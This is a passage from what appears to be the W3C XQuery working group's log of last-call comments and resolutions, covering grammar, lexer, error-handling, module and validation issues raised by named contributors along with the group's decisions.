constraint. Possible solution 2: treat element(person,Company) as the following local XML Schema element: <xs:element which is simple, but excludes substitution groups from the semantics. -- Mary Fernandez <mff@research.att.com> AT&T Labs - Research RESOLVED by July WD changes, and internal FS. In Section 3.2 on Path Expressions, the XQuery draft says (twice): "At evaluation time, if the root node above the context node is not a document node, a dynamic error is raised.[err:XP0050]" Error XP0050 has to do with the treat expression, so I don't think this is the right error number. Thanks, Priscilla Walmsley We believe that this is the correct error to raise. Jerome will respond to this comment. Don: This error occurs when you do, $x treat as document, or when you do // (which expands to include "treat as"). Resolution is to explain that. Jerome will respond. L.S., Can the implementation of a computed elemement constructor freely choose the order of the attribute nodes? For example, is the result of element { "a" } { attribute { "b" } { "" }, attribute { "c" } { "" } } always <a b="" c=""/> or can it also be <a c="" b=""/> ? I would expect the latter for fundamental (attributes are essentially unordered) and practical reasons (letting the implementation choose a certain ordering my sometimes make certain operations more efficient), but It's not clear to me what the informal and formal semantics exactly have to say about this. I already raised a related point before (the document order of the contents of an element created with a computed element constructor seems underspecified) but am not sure about the follow-up, so if this has already been discussed I apologize. -- Jan Hidders -- .-----------.-----------------------------------------------------. / Jan Hidders \ Home Page: \ .---------------.-----------------------------------------------------. | Post-doctoral researcher e-mail: jan.hidders@ua.ac.be | | Dept. Math. & Computer Science tel: (+32) 3 265 38 73 | | University of Antwerp fax: (+32) 3 265 37 77 | | Middelheimlaan 1, BE-2020 Antwerpen, BELGIUM room: G 3.21 | `---------------------------------------------------------------------' Andrew: This is covered by the DM spec, 2.4 Document Order, numbered item 4. Don: We should answer with the DM reference. This is a badly lacking feature in XQuery: AFAIK, there is no way to recover/catch a dynamic error after it happens. Actually, at least two kinds of dynamic errors should be distinguished: fatal / non-fatal, or non-recoverable / recoverable (XSLT2 has this distinction). Clearly there is a semantic difference between: 1) a wrong regular expression: this is a programming error, there is no real point to recover it 2) trying to parse a document is an environment-dependent operation, that may fail for unpredictable reasons: there isdefinitely a need to recover such an error Two possible solutions: 1) introduce an error catching mechanism -- in my implementation (Qizx/open) I have simply added a catch-error() function. But a more sophisticated mechanism (try/catch) would probably be better. 2) at the very least, consider modifying some functions like doc() so that they return a conventional value (eg the empty sequence) instead of raising an error 2. File exists. RESOLUTION: rejected, closed 2. File exists. RESOLUTION: rejected, closed PC: Can we close with comment that error handling will be a v2 version. MH: Error handling is very important for our customers MRys: You can add "must-understand" extensions. PC: It's a trade-off between time and functionality. MHK: It's complex, let's leave till next version. Close with negative decision. Jonathan will respond to Xavier. Dissenting vote from MH from Mark Logic Xavier's second comment is related to Liam's comment below. Process with Liam's comment on the F&O agenda. Status: We discussed this matter at the F2F under: > 19. Request for function fn:validatesCorrectly > qt-2004Feb1001-01 and decided to not add either the proposed function or general error handling. At meeting 173 Andrew proposed that he wanted to consider a minimal try/otherwise construct could be considered. Andrew has now informed me that IBM does NOT want to go this direction. I therefore propose that we resolve this comment based on the F2F decision e.g. no try/catch functionality until V2. Related comments: [QT] CER-05 Catching dynamic errors, Mary Holstege Hi Folks, [If this has already been answered, or this is not the appropriate venue for the question then please direct me to the appropriate place.] In the latest XPath 2.0 spec it defines a quantified expression as follows: QuantifiedExpr ::= (("some" "$") | ("every" "$")) VarName "in" ExprSingle ("," "$" VarName "in" ExprSingle)* "satisfies" ExprSingle And ExprSingle is defined as follows: ExprSingle ::= ForExpr | QuantifiedExpr | IfExpr | OrExpr I do not believe that this is correct. Here is one of the examples that is given in the discussion on quantified expressions: every $part in //part satisfies $part/@discounted The satisfies expression in the example is: $part/@discounted Clearly, it is neither a ForExpr, a QuantifiedExpr, an IfExpr, nor an OrExpr. In fact, wherever SingleExpr appears in the quantified expression it makes no sense. Can someone provide the correct BNF for the quantified expression? /Roger I think you want to bind ors inside the satisfy clause. I agree with Scott that the current grammar seems to give the right precedence... A PathExpr is also a ExprSingle. Best regards Michael To try and amplify Scott's response, note that OrExpr is an expression that *might* contain an "or" operator, not an expression that *must* contain an "or" operator. To simplify the grammar, when you have a series of rules such as: OrExpr ::= AndExpr ("or" AndExpr)* AndExpr ::= ArithExpr (("+"|"-") ArithExpr)* ArithExpr ::= PathExpr then every PathExpr is an ArithExpr, and every ArithExpr is an AndExpr, and every AndExpr is an OrExpr, and therefore you can use a PathExpr everywhere an OrExpr is allowed, which means you can use it in the "satisfies" clause of a quantified expression. Michael Kay Hi, I was surprised when I looked in the XQuery specification for a media type definition, but couldn't find one. I believe XQuery should have its own. FWIW, there's a TAG finding that seems to recommend it too; "W3C Working Groups engaged in defining a language SHOULD arrange for the registration of an Internet Media Type (defined in RFC 2046 [RFC2046]) for that language" -- Thanks! Mark. -- Mark Baker. Ottawa, Ontario, CANADA. We now have an appendix about application/xquery. RESOLVED: qt-2004Jan0379-01 closed Liam will reply (see ACTION A-216-09 above) [done] There seems to be a missing S between PITarget and Char* in the rule for XmlPI in the spec: Current rule: XmlPI ::= "<?" PITarget Char* "?>" Should be: XmlPI ::= "<?" PITarget (S Char*)? "?>" -scott Hi Scott. Your last call comment in [1] has been given the ID qt-2004Jan0360-01. This is the official response from the XQuery and XSLT working groups. Your issue pertaining to the error in the XmlPI has been accepted, and the WGs have approved the fix you suggested. The production will read: [110] XmlPI ::= "<?" PITarget (S Char*)? "?>" /* ws: explicit */ (Since I am writing this to myself, this mail should also provide the confirmation that this fix is satisfactory!) -Scott Boag [1] SB said he believes this item should be closed. DECIDED: to confirm the decision to follow the XML syntax for XmlPI slavishly. RESOLVED: qt-2004Jan0360-01 has been resolved by our decision to follow the XML syntax for PIs. I am raising this comment because I have seen several XQuery users make mistakes as a result of the syntactic inconsistency between global variable declarations and local variables, and there seems to be no good reason why they are so different. For global variables we write: declare variable $x [as xs:integer] {3}; while for local variables we write: let $x [as xs:integer] := 3 I suggest changing the global variable syntax to: declare variable $x [as xs:integer] := 3; An external variable would be: declare variable $x [as xs:integer] external; Michael Kay ([XQuery] Inconsistent syntax for variable declarations) Approved In section A.2.2 Lexical Rules, "<!--", "<?" and "<![CDATA[" go to XML_COMMENT, PROCESSING_INSTRUCTION, and CDATA_SECTION respectively with pushState(). The direct element constructor "<" goes to START_TAG with pushState(OPERATOR) Since the OPERATOR state is not pushed for comments, pis, and cdata, the following is illegal: let $a := <!-- foo --> return $a whereas let $a := (<!-- foo -->) behaves correctly. We suggest changing "<!--", "<?", and "<![CDATA" to push the OPERATOR state so the parentheses are not necessary. --Sarah Response Given: XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.2.2 Lexical Rules Some of the lexical states have incorrect transitions, causing the lexer to reject valid queries. Specifically: ------------------------------------------------------------------------ Query: <!---- blah ----> | e Query: <?PITarget ?> | e Query: <![CDATA[x]]> | e Problem: In each case, after the ">", the lexer is in DEFAULT, which doesn't recognize "|" (or any other operator). Fix: In DEFAULT, for the transitions on "<!----", "<?", and "<![CDATA[", change "pushState()" to "pushState(OPERATOR)". Note: I reported this on November 28, 2002 (three versions ago), in ------------------------------------------------------------------------ Query: <Q> { typeswitch (e) case e return e default return e } </Q> Problem: After the "}", the lexer is in OPERATOR, which doesn't recognize "</". Fix: In DEFAULT, the transition for <"typeswitch" "("> should not involve "pushState(OPERATOR)". ------------------------------------------------------------------------ Query: processing-instruction {x} {x} Problem: Accepting the last "}" causes popState() on an empty stack. Fix: In OPERATOR, the transition for "{" needs "pushState()". ------------------------------------------------------------------------ Query: declare variable $x as processing-instruction()? external; e Problem: After the ")", the lexer is in OPERATOR, which doesn't recognize "?". Fix: In ITEMTYPE, the transition for <"processing-instruction" "("> should change "pushState(OPERATOR)" to "pushState(OCCURRENCEINDICATOR)". ------------------------------------------------------------------------ Query: declare variable $x external; e Query: declare function Q() external; e Problem: These leave DEFAULT on the stack. It's not clear whether this means that the lexer should reject them, but even if not, it's still bad form: a lexer with a maximum stack size would be much more likely to hit its limit. Fix: In DEFAULT, for the transitions on <"declare" "variable" "$"> and <"declare" "function">, don't "pushState(DEFAULT)". ------------------------------------------------------------------------ -Michael Dyck Response Given: XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.2.2 Lexical Rules Many states have transitions on patterns that aren't valid for that state. That is, for a query to put the lexer in the given state with the remaining input matching the given pattern, the query would have to have a syntax error. By accepting the erroneous pattern, the lexer delays detection of the syntax error. Specifically, I believe the following patterns are erroneous in the given states. DEFAULT "]" "," "[" OPERATOR <"declare"_"function"> <"at"_StringLiteral> "global" "(" <"validate"_"{"> <"typeswitch"_"("> <"declare"_"default"_"collation"> <"import"_"schema"> <"import"_"module"> <"declare"_"default"_"element"> <"declare"_"default"_"function"> <"declare"_"namespace"> <"declare"_"base-uri"> <"declare"_"xmlspace"> <"some"_"$"> <"every"_"$"> IntegerLiteral DecimalLiteral DoubleLiteral QName <NCName_":"_"*"> <"*"_":"_NCName> "." ".." NAMESPACEKEYWORD <"at"_StringLiteral> <"declare"_"default"_"element"> <"declare"_"default"_"function"> KINDTEST "@" StringLiteral SCHEMACONTEXTSTEP "@" START_TAG "{" END_TAG "{" -Michael Dyck Response Given: XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.2.2 Lexical Rules In some of the states, there are conflicts between some of the patterns, i.e. cases in which the input could match more than one pattern. Specifically: OPERATOR: conflict between QName and all the single-keyword patterns (e.g., "external", "skip", "default"). (Luckily, this appears to have an easy fix: simply delete QName from the state: I don't think it's valid here.) KINDTEST: conflict between QName and the keywords "context" & "global". EXPR_COMMENT: conflict between ExprCommentContent, PragmaContents, and ExtensionContents. (Fix: They're all defined to be Char, so you could just replace them with Char in the EBNF and here.) EXT_KEY: conflict between QName and the keywords "pragma" & "extension". -Michael Dyck Response Given: I posted a comment to the XQuery WG last year that was moved to become a last call. The mail is located at I was asked to forward it to the public list, so here is the content of the mail for public archiving and replies: This mail proposes an improvement to the query prolog syntax to address the ordering issues that several of my implementers have raised and that I have reported previously. Currently the grammar allows a function declaration before the default collation declaration, and a schema import can syntactically occur after a function declaration that refers to the type name imported. Since this arbitrary ordering complicates the prolog processing and the specification of such, we would like to propose a certain order in the prolog. We first have the version, then a group of context setters, then a group of namespace declarations and imports and then the variable and function declarations. I propose two syntactic varieties that distinguish for variable and function declarations and present the choice between two semantic varieties for the variable reference case. Note that I assume that we continue to allow a function declaration to refer to a function that is syntactically declared later at the same module level. Syntax A: ========= Prolog ::= (Version Separator)? (Setter Separator)* (Decl Separator)* (VarDecl Separator)* (Function Syntax B: ========= Prolog ::= (Version Separator)? (Setter Separator)* (Decl Separator)* (VF VFDecl ::= VarDecl | FunctionDecl Semantic Interpretation I: -------------------------- Example 1: declare variable $a as xs:integer { $b + 42 } declare variable $b as xs:integer { 0 } Example 2 (only for Syntax B): declare function foo($x as xs:integer) as xs:integer { $x + $const } declare variable $const as xs:integer Both examples work without error. Semantic Interpretation II: --------------------------- Neither of the two examples works. The declaration of $a in Example 1 would raise an error about not having $b declared yet, and the function body in example 2 would raise an error that the $const has not been declared yet. Which would you prefer? A.I., A.II., B.I., or B.II? We have a slight preference of A over B and interpretation II over I, but can live with the others. Best regards Michael Response Given: Section 3.1.1 Literals Technical XQuery String literal should not recognize any entities as part of the human-readable syntax. Requiring support will make parsing and user-understanding of strings like "H&M" way too complex. Resolved, this is rejected. DonC: There are use cases for this in the language document, e.g. Euro character. MRys: No, that depends on input tool. Q: DonC's example is a character reference; comment only speaks to entities. A: Believe that is an oversight. Dana: Don't believe we should distinguish this from character reference issue. Limits XQuery to devices where you can enter Unicode, which I don't think this is a good idea. If we support character reference resolving, suggest we support both. Don: Worried about cases where content of string contains both kinds of string. Don't I need character references for one of them? A: No, can double them. MH: Agree Dana. MKay: Something to be said for proposal, but uneasy about it. In part because we don't say, for example, that query is Unicode. Say nothing about encoding. Have to take them both entity and character references together. Don't get benefit of writing freestanding ampersand unless you get rid of both or use context-dependent parsing or escaping mechanism. But would be happier handling Unicode problem through context-free preparse of string the way Java does. No support for the proposal. We have no statement about what encoding queries are in, and if encoding is not Unicode, we need a way to ensure that regardless of the context there should be a way to input the Unicode characters. Given you need & for the character references anyway, seems appropriate to have the same rules as in literal element content and have the predefined entities as well. DonC to respond. We decline to make the change. Sections 2.6.6.1/2.6.7.1 Technical Why are the Flaggers mandated when providing extensions? This is basically a parser option and should be left to the implementation. I can always run somebody else's query that contains pragma since I can ignore them (as can other implementations) and other implementations will always flag extensions anyway. This seems to make the flagger only an implementation nuisance. Flagger are no longer mandated, solved by removing flaggers. Section 2.6.5/6 Technical Please add a specification of the scoping of the pragma/extension (implementation-defined? Within a FOR?). We would prefer to have the scoping implementation-defined on a per pragma/extension basis. MR: the new scoping of the syntax makes it much clearer. Sections 2.6.5/6 Technical Do not mandate the QName in a pragma/extension, but allow it (make pragma content+). Do not require it to be a unique identifier. For example, I may want to use the same pragma QName for all my pragmas to indicate the product and use sub content to indicate other information. MR: the new method makes more sense. Sections 2.6.5/6 Technical Provide static contexts for pragma/extension information MR: now we have options I think it's clearer PC, LQ, MH: they're implementation defined, so we don't need to say this [the impl'n can do what it wants with the options, including this] Section 2.6.3 Full Axis Feature Editorial Please reword: "(however, XQuery does not recognize the namespace axis defined by XPath)." to "Note: XQuery does not recognize the namespace axis defined by XPath 2.0." DECISION: To leave to the editor, who advised us that he rejects the proposed change RESOLVED: qt-2004Jan0200-01 closed, rejected editorially Section. --RESOLUTION. Closed. No action required. Overtaken by events. Section 2.5. Error Handling Technical Please add a sentence of the form "If an implementation can determine during analysis phase that an expression is always raising a dynamic or type error (if static typing option is not used), that error can be reported during the analysis phase". DonC: Text exists in 2.5.1 "Kinds of Errors" MKay: Text as quoted is not sufficient; doesn't cover cases where you can just infer error. DonC: We considered that and issue of what if this was in an else branch; if you don't know it is executed you don't want to raise the error. We therefore came to the existing working. Amended: "If an implementation can determine during analysis phase that an expression is always raising a type error (if static typing option is not used), that error can be reported during the analysis phase" Adopted. DonC to respond. Section 2.4.2 Typed Value and String Value Technical "If the type annotation denotes a complex type with element-only content, then the typed value of the node is undefined.": The data model already makes this case an error. Please align the specs. WG believes specs are aligned. First sentence is simply an explanation of why data model would return error for dm:typed-value, which reflected at language level by call to fn:data raising a type error. No change. ACTION: DonC will send response. Section 2.4.2 Typed Value and String Value Editorial/Technical Remove references to "namespace nodes" since they are not exposed in XQuery. Subsumed by qt-2004Feb0207-01 >> Don has no problem making the change in this section, but will be references to namespaces nodes in many other places in the document. >> Michael Kay: the statement as written is true, but doesn't hurt to remove it here, as is defined in the data model anyway. >> This section doesn't talk about getting the value of a namespace node, just asserts that it has one. >> Michael R: his comment was only on this specific part of the document, and doesn't make sense to talk about getting the string value of something we can't reach. >> Don: This section just recapitulates what the DM says. >> Paul: DM section 5.5, last call Nov 5. Link takes him to E.5. >> Michael: in XQuery, is on way to get the value of a namespace node, because we can't get access to the node. >> But in XPath we can. But since this is an XQuery document, we shouldn't refer to things you can't reach. >> Don: We could name namespace XPath only in this paragraph... >> I'm neutral. >> Anyone disagree or can't live with Michael's change? >> Paul: instead, add a note that indicates that because ns axis is not accessible in XQuery... >> Don: would make it a rule not a note. >> ACCEPTED, but instead of the proposal, we will add text to XQuery to explain the non-accessiblity of namespace ndoes. Don to make the change and reply to the public comment. Section 2.4.1 Predefined Types Technical "xdt:untypedAny is .." See problem raised in MS-DM-LC2-038 (see ). xdt:untypedAny should only cover the untyped not and skip validated cases. Already resolved in prior meetings. Section 2.2.5 Consistency Constraints Editorial/Technical "For every data model node that has a type annotation other than xs:anyType" add both untyped types or just assume that all types are always in the ISSD (xs:anyType, xdt:untyped etc) and do not special case these types. This has been fixed in the document XQuery currently lacks a mechanism to return metadata describing the persistent objects of interest to its users. While this capability could be added to each of the APIs that are designed for XQuery, we suggest that it would be better for XQuery to provide this metadata. SQL defines the Information Schema tables that reflect its metadata. While these tables were provided in SQL-92, they have not been widely implemented. By the time that they were published, vendors had already started defining their own tables and API methods to make this type of information available. XQuery users can make reference to a number of objects in their queries. The following table shows each of these objects and describes which constructs allow their use. XQuery object clause that allows the use of this object schema Schema Import in prolog module Module Import in prolog collation Default Collation Declaration in prolog OrderModifier in OrderBy Clause functions such as fn:contains collection fn:collection document fn:doc XQuery metadata might be provided by a function, fn:metadata. This function would return the descriptions of schemas, modules, collations, collections, and documents that are accessible to the issuer of the query. A schema would be provided to describe the document or element produced by this function. Implementations could provide additional metadata by extending the types defined by this schema. An application might request the entire metadata document, or it might operate on it with XQuery to return only part of this metadata. We recognize that some XQuery implementations are "closed world", with all objects of these types registered in a repository of some sort, while others are "open world", attempting to resolve URI's across the world wide web. We suggest that the objects described by fn:metadata be defined to return a subset, possibly an empty subset, of the objects that can be used in a query. An open world implementation might return no object descriptions at all. A user might issue the following query: for $c in fn:metadata()//xqm:collection return fn:data($c/xqm:collection-uri) This query might return the following: . . . -- Andrew -------------------- Andrew Eisenberg IBM 5 Technology Park Drive Westford, MA 01886 andrew.eisenberg@us.ibm.com Phone: 978-399-5158 Fax: 978-399-5117 Metadata is difficult. Jim: it's needed for just about any query that's going to be generated dynamically We learned that the hard way with static SQL. If we don't provide it in XQuery, a lot of designers of the environments in which it's used will have to provide it. JR: what are the use cases? Andrew: IBM thinks it's necessary. We have a number of statements, e.g. import schemas, documents, open collections, and there's no way to discover those. MR: SQL 1 didn't have this. Liam: we would need liaison with external goups, e.g. RDF WG, and that could take a long time. Jim: I don't think it would be that hard to come up with a small set of metadata that we believe is urgently required. By the time we got to SQL 92, vendors had all invented incompatible mechanisms. JR: a lot of queries that need metadata in SQL, you can get them through element and attribute names in XQuery. We've taken a bunch of use cases in this area and solved them. The functionaliy is important and should be done right. Andrew: Imagine you're in a GUI writing a query, you want a pull-down list of available schemas and modules. PaulC: I hear Oracle and IBM saying V1; Michael and Data Direct and Liam say not in V1, I haven't heard Mary Mary: also not in V2, there are parts of this proposal that would be [hard or impossible to implement], I'm sympathetic to the proposal but I want to sit down and discuss it. PaulC: not enough consensus for V1, so we have to reject the comment in order to meet our schedule. Jim: in the XSLT world there's esxlt; those of us interested in doing something like this would like an efn by analogy. Section 2.2.3.2 Dynamic Analysis Phase Editorial/Technical is too strong. If I know for sure that I always will have a dynamic type error (e.g., the expected type is xs:string and the passed value is always an instance of xs:int, I should be able to raise this type error during the static phase even if the static typing feature is not employed). [implementations] are allowed to detect errors early, so why should the implementation be forced to go through the dynamic evaluation phase? The problem is "must proceed with the dynamic evaluation phase". Replacing "must" with "may" is the intent. Principles: 1. If you raise a type-related warning, you do not need to proceed with dynamic eval phase. 2. If you do proceed with dynamic evaluation phase after type-related warnings have been raised, you need to raise type-related errors. ACCEPTED, Don to make the change and reply to the public comment. Section 2.2.3.1 Static Analysis Phase Technical "During the static analysis phase, if the Static Typing Feature is in effect and the static type assigned to an expression other than () is empty, a static error is raised.": We also need to exempt fn:data(()) which is used by atomization since we atomize () in an expression such as foo(()). >> Paul: Is making sure the sentence is exactly correct. >> Don: already done. >> ACCEPTED, Don to reply to the public comment. Section 2.1.1 Static Context Editorial How does module import affect the static context items? subsumed under f2f 13A: > a) Consistency rules for static context components, Don C > (1) delete the sentence from C.1 --> adopted (2) three new cases a) binding to the same namespace prefix more than once --> adopted, a static error b) user tries to bind the same variable name more than once --> withdrawn, see discussion below, with clarifications as listed below c) xmlspace declared more than once in the prolog --> adopted, a static error Discussion of (b) by examples: 1: for $i in $this, $i in $that return $i 2: for $i in $this, $i in that($i) return $i 3: for $i in $this return for $i in $that($i) return $i 4: for $i in $this return for $i in $that return $i Looking at "The scope of a variable", Don deduced (1) isn't an error. Agreement that (4) is legal. Agreement that (4) is the same as (1), although Michael Rys produced 5: for $i in $that return for $i in $this return $i and claimed that (1) mapped to both (4) and (5). Jonathan and MichaelR both wanted the introductory text in section 3.9 FLWOR Expressions under "The scope of a variable" should probably read "the lexical scope of a variable", and it would help if the example 1 was shown to be the same as 5, because the second $i occludes the first declarations. Don will try to clarify the document, although not necessarily adding this example. adopted. Section 2 Basics Technical For XPath 1.0 backwards compatibility, the string value of a node should be of type xdt:untypedAtomic. MR: For Query, want string() of a node always to return untypedAtomic. No support in the WG. Neither form of comment constructor gives any indication of what is to happen if (after atomization/casting) the string contains the sequence "--" or ends in "-" neither of which are allowed in an XML comment. 3.7.2 Other Direct Constructors 3.7.3.6 Computed Comment Constructors <!-- abc -- xyz --> comment { "-123-"} Both appear to be legal Xquery, but neither can directly result in an XML comment and the first can not result in an XPath/Xquery data model comment node: somewhat strangely only bans "--" but allows a trailing "-". By contrast, the xslt2 draft says, [ERR XT0950] It is a recoverable dynamic error if the result of evaluating the content of the xsl:comment contains the string -- or ends with -. The optional recovery action is to insert a space after any occurrence of - that is followed by another - or that ends the comment. David ________________________________________________________________________ This e-mail has been scanned for all viruses by Star Internet. The service is powered by MessageLabs. For more information on a proactive anti-virus service working around the clock, around the globe, visit: ________________________________________________________________________ See [448]. duplicate of qt-2004Feb0636-01, -- in comments. RESOLUTION: closed duplicate of 36, -- in comments. RESOLUTION: closed Do we want this to be an error, or do like XSLT2 that makes this recoverable? [people agree to go the XSLT2 way, making this recoverable] Don will fix this, and PaulC will reply to this public comment. I am having trouble understanding the meaning of the validation context which may be specified in a validate expression (and equally, the implicit validation context used when validating element constructors) This seems to be specified largely by example. One of the examples is: Suppose that $x is bound to a shipTo element. Then validate strict context po:purchaseOrder {$x} validates the value of $x in strict mode, in the context of the top-level element declaration po:purchaseOrder. So what happens if the element declaration po:purchaseOrder has the content model: <xs:sequence> <xs:any </xs:sequence> Is the shipTo element valid here? I would hope that it is, because the schema says it is allowed as a child of purchaseOrder, and it seems wrong that we should be able to create a structure that fails validation even though it conforms to the schema. But the specification suggests otherwise: "strict requires that each element to be validated must be present in the in-scope element declarations,...". So, perhaps there is a global element declaration for shipTo. Does this affect the outcome? Am I allowed to use the global element declaration, even though the context path for validation specifies some local declaration? It would be very strange if this were the case, but that's what the text seems to suggest. But now read it again. The "in-scope element declarations" does not contain elements, it contains element declarations. What does it mean for "the element to be validated" to be "present in the in-scope element declarations"? Section 2.1.1.1 says "Each element declaration is identified either by a QName (for a top-level element declaration) or by an implementation-dependent element identifier (for a local element declaration)". But the section on validation seems to be assuming otherwise: it seems to assume that an element declaration is identified not by a QName, but by some kind of path. Of course an element declaration that's contained in a group, or that's referred to be an <xs:element can be reached by many different paths (an infinite number of paths). Are these paths allowed to contain wildcards or not? I'll stop there. Perhaps this is all clarified in the formal semantics? XSLT 2.0, incidentally, avoids these problems. It does not allow validation against anything other than a global element declaration or a global type. Michael Kay On an internal list, I raised the following comment: <quote> In section 4.2 of the XQuery language book we say: The names of all variables and functions declared in a library module must be explicitly qualified by the target namespace prefix.[err:XQ0048] This must be the only place we mandate the use of a specific prefix, as distinct from a specific URI. Was it intentional? It seems very much contrary to the intent of QNames and namespaces. I suggest that this should say: "The name of every variable and function declared in a library module must have a namespace URI that is the same as the target namespace.[err:XQ0048]" Practical use case: you might want to cut and paste a set of functions from one module into another. Rather than changing the old prefix everywhere it appears, you would expect to be able to declare the old prefix to map onto the new URI. </quote> The WG discussed this comment at a telcon on 2003-12-17 and agreed with the suggested text. To ensure public visibility, I was given the action (XQUERY-162-05) to raise this as a public comment. Michael Kay On an internal list, I raised the following comment: "There appears to be no explicit rule stating that the module namespace of an imported module must differ from the module namespace of the importing module. Clearly such a rule was intended." The Query WG discussed this on 2003-12-17, and agreed the change in principle; to ensure public visibility I was given the action (XQUERY-162-04) to raise the matter on the public comments list. More recently, Per Bothner has raised the same question in a rather more generalized form: See Last Call issue reference qt-2003Dec0288-01 The WG discussed Per's comment at a telcon on 2004-01-14 and scheduled further discussion at the face-to-face next week. I imagine this discussion is likely to revisit the 2003-12-17 decision. Michael Kay c) [XQuery] Uniqueness of module namespaces, Michael Kay Status: We need to finalize our position since MK implies that we might re-consider our position. In the second part of the text, referring to Per's comment, MikeK seems to imply that we might change our mind. So, PaulC will send a message that we will not revisit this issue. Reading the working draft (W3C Working Draft 12 November 2003) and testing some XQuery tools left the impression that the axis features are sort of neglected by leaving features optional, which is not acceptable. The introduction of the Full Axis Feature (section 2.6.3) open a way for implementers to claim XQuery conformity without supporting certain axis such as the sibling and ancestor axes. These might not be relevant in unordered databases such as address tables, where sorting takes place, if required, after querying; but XML data provides an essential component namely the preservation of the order. Annotation formats for speech for example rely on rather flat XML trees that maintain the linear order of speech. These annotations clearly show a data centered approach to XML, which makes it a candidate for processing with XQuery rather then XSLT. But querying such data is interesting if access not to the whole subtree but to a context is possible. The same is true for flat structured textual documents where distributional analysis of texts are required and wanted. Accessing the linear structure of XML documents is a major advantage of XML based databases for certain applications and clearly distinguishes these DBs from relational data where these access structures are not to be maintained. Especially for the processing of natural language, in data or document based XML, the full set of axis needs to be available. I would strongly recommend the change of the following: 1. Section 3.2.1 OLD sentence: XQuery supports the following axes (subject to limitations as described in 2.6.3 Full Axis Feature): <bulletlist> NEW sentence: XQuery supports the following axes: <bulletlist> 2. Section 2.6.3 needs to be deleted. Vendors will provide their personal flavors of XQuery, if the feature is in the specification or not. But at least they should not find an excuse for omitting certain axis that are justified. If necessary I can provide example queries which are needed in language databases. A workaround with user defined functions (using features such as the node number or position) or more complex contstructs is not acceptable, as it seems to violate the priciples of navigation in XML trees. Missing features like this would doom XQuery to failure in large and progressing XML using communities. Thorsten -- ----------------------------------------------------------------------------- ///////// Thorsten Trippel ttrippel@spectrum.uni-bielefeld.de // Computational Linguistics and Spoken Language // // Research Group: Text technological modelling of information // // URL: // Bielefeld University, Federal Republic of Germany ///////// Department of Linguistics and Literary Studies ----------------------------------------------------------------------------- PaulC will reply to this, alike to the David Carlise comment. I asked this before, but even the latest drafts don't seem to have a clear answer for whether there can be multiple library modules with the same namespace. Assume mod1.xql: module namespace m = "M"; declare function m:f() { 1 } and mod2.xql: module namespace m = "M"; declare function m:g() { 2 } Is the following main module allowed? import module namespace m1 = "M" at "mod1.xql"; import module namespace m2 = "M" at "mod2.xql"; m1:f()+m2:g() How about this? import module namespace m = "M"; m:f()+m:g() The statement in 4.7 that "The module import identifies the module to be imported by its target namespace" implies neither are allowed because in this case you cannot identify the module by its target namespace. But phrasing is sufficiently imprecise that I can't be sure what's intended. It would be nice to clarify this, either: A. The target namespace must match a single library module; it is a static error if multiple modules have the same namespace. or: B. If multiple modules match the target namespace, then they are all imported. My assumption (and strong recommendation) is that A is intended. -- --Per Bothner per@bothner.com > a) qt-2003Dec0288-01, multiple modules with same namespace > > Status: Deferred for further discussion at the XQuery F2F. Rys: we already have constraints in the static context. We might need more. Don: we could choose the simplest approach here. Which is option a), getting rid of the hint syntax. Jason/MaryH: we need this as use case, when we split functions in more files, during development. Dana: but you could use a URI resolver for that. Like similarly happens on Java, binding the logical resource to the physical resources. Rys: the things Mary and Jason want is more pertinent to a Query System rather than to a Query Language. Questions: Q1: can you have more than one ModuleImport for the same target namespace? (Per's question) [no; if you want more than one location hints use the facility to have multiple location hints] Q1a: can you have more than one ModuleImport for the same target namespace? with different locations? [no] Q2: can the namespace prefix which assigned to URI1 in one MOduleImport be the same as the Namespace prefix which is assigned to URI2 in a second ModuleImport? It should be no, but do we allow this now? Rys: We have a constraint that a Prefix must be bound to a single namespace Andrew: error XQ0033 might apply here Q3a: should we consider changing the syntax to permit multiple location hints (instead of just one) (in order to prohibit multiple ModuleImports for the same URI) [acceptable to many wg member] [and if so, we should do it for schemas too] Q3a': if we accept this should we do this for Schemas as well (for symmetry)? Q3b: should we consider dropping the location hint completely leaving the resolution of locations up to the URI resolver)? [two people in favour: Rys, Dana] So, Per's example: import module namespace m1 = "M" at "mod1.xql"; import module namespace m2 = "M" at "mod2.xql"; m1:f()+m2:g() could be written for instance as import module namespace m1 = "M" at "mod1.xql", "mod2.xql"; m1:f()+m1:g() *** * ACTION A-TAMPA-08 * on Don * to implement the resolution to * qt-2003Dec0288-01, multiple modules with same namespace, * and to reply to Per's public comment * (cf. ) *** Hints to Don for implementations of this proposal to add multiple location hints and to to prohibit multiple imports: a) Consider using text for success/failure of SchemaImport for ModuleImport b) multiple location hints should be comma separated c) consider errors if moduleImport causes function/variables/etc to be duplicated from multiple location hints d) do we raise an error if a ModuleImport causesw functions, variables etc to be duplicated form more than one location hints ---- Related question on modules by Don and IBM developers: If a module imports something (say a schema) that defines some type, and a query imports than module, I don't get eg the schemas that the module imports, but the functions. So I have to know the schemas, and explicitly import themselves. So, if I import a function that imports some type, why those types aren't imported too..? My IBM colleagues think this is broken. [people can't recollect] [so, Don will file in a Last Call comment by IBM] I would like to enter this as a last call comment from DataDirect. Jonathan > From: "Peter Coppens" <pgp.coppens@pandora.be> >To: <www-ql@w3.org> >Date: Fri, 19 Dec 2003 16:36:44 +0100 >Subject: Precedence rules for QuantifiedExpr - OrExpr - AndExpr >X-Mailing-List: <www-ql@w3.org> archive/latest/701 >X-Loop: www-ql@w3.org >Sender: www-ql-request@w3.org > >All, > >Looking at the XQuery spec, I am somewhat surprised by the consequences of >the precedence rules for QuantifiedExpr - OrExpr and AndExpr > >What I mean is: > >Take the query > >for $x in (1,2,3) >where > some $y in (1,2) satisfies 1 = $y and $y = 1 >return $x > >Which, I think, is equivalent to > >for $x in (1,2,3) >where > some $y in (1,2) satisfies (1 = $y and $y = 1) >return $x > >But now take the query > >for $x in (1,2,3) >where > some $y in (1,2) satisfies 1 = $y or $y = 1 >return $x > > >Which, I think, is equivalent to > >for $x in (1,2,3) >where > (some $y in (1,2) satisfies 1 = $y) or $y = 1 >return $x > >I find that rather confusing. > >So I guess I have the following questions > >(1) is the above interpretation correct? >(2) is this a deliberate choice and if yes, are there any motivations for >that decision that can be shared? >(3) would it not be possible to add an extra level of precendence where the >OrExpr comes to sit between QuantifiedExpr and AndExpr, or would that >propagate to have other side effects? > >Thanks, > >Peter > I was rather surprised by this comment, but looking at the way the spec is > written, I can see how you came to this conclusion. So you see the issue being that "or" 